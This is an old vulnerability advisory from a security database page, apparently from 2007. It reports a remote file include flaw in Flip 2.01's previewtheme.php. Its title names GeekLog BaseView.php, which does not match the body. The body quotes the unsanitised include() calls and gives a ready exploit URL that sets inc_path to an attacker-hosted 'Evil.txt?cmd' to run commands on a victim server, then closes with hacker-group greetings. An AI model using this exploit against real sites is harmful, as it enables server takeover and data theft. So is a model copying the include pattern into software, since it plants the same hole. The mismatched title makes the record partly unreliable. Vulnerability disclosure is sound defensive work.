Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15991
HistoryFeb 07, 2007 - 12:00 a.m.

GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

2007-02-0700:00:00
vulners.com
31
Flip-2.01-final 1.0 <=  Remote File Include Vulnerability

Discovered by GolD_M(Mahmnood_ali) & & Contact: [email protected]

URL:

http://releases.smallaxesolutions.com/flip-2.01.zip

V.CODE: In : [path]/previewtheme.php

include($inc_path . "options.php");
include($inc_path . "head.php");

Exploit:

http://Www.Victim.Com/[path]/[path]/previewtheme.php?theme=1&inc_path=Evil.txt?cmd

Thanx : ThE dE@Th & Codebreak & Dr Max Virus & Milw0rm.com & H4cky0u.Com & Google.Com

SpeciaL GreeTz : Tryag.Com & DwRaT.Com & Asb-May.Net